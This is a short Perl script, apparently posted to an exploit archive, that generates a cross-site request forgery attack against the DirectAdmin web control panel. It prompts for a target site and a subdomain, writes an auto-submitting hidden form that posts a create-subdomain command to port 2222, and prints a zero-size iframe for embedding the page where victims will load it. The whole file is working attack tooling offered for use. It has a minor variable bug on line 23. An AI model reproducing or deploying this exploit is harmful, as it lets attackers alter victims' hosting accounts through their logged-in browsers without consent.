DirectAddSubDomain.pl

1. #!/usr/bin/perl
2. ########################################################################
3. # Title : DirectAdmin Web Control Panel � 2005 JBMC Software
4. # Author : Onur T�RKE�HAN
5. # Homepage : http://www.directadmin.com/
6. # tested on : Windows 7
7. # Seni Unutmayacagiz MIRIM-
8. system("cls");
9. print
10. "
11. +----------------------------------------+\n
12. | directadmin csrf vuln creator by turkeshan |\n
13. | cyber-warrior.org lojistik grup |\n
14. +----------------------------------------+\n
15. Loading ...\n
16. ";
17. sleep(3);
18. print "Site aDi ";
19. $h = <STDIN>;
20. chomp $h;
21. print "Sub Domain Adi ";
22. $sub = <STDIN>;
23. chomp $usub;
24. $html = '<form name=info action="http://'.$h.':2222/CMD_SUBDOMAIN?domain='.$h.'" method="POST">
25. <input type=hidden name=action value="create">
26. <input type=hidden name=domain value="'.$h.'">
27. <input type=text name=subdomain size=8 value="'.$sub.'">
28. <script>document.info.submit();</script>
29. </form>';
30. sleep(2);
31. print "olusturuluyor ...\n";
32. open(XSS , '>>csrf.htm');
33. print XSS $html;
34. close(XSS);
35. print "olusturuldu .. \n";
36. sleep(2);
37. print "dosyayi sitenize upload edin ve dosya ismini yazin";
38. $csrf = <STDIN>;
39. chomp $csrf;
40. $done = '<iframe id="iframe" src="'.$csrf.'" width="0" height="0"></iframe>';
41. sleep(2);
42. print "exploit basariyla tamamlandi \n";
43. print $done."\n";
44. print "";
45. print "\n hayrini gorun .. ";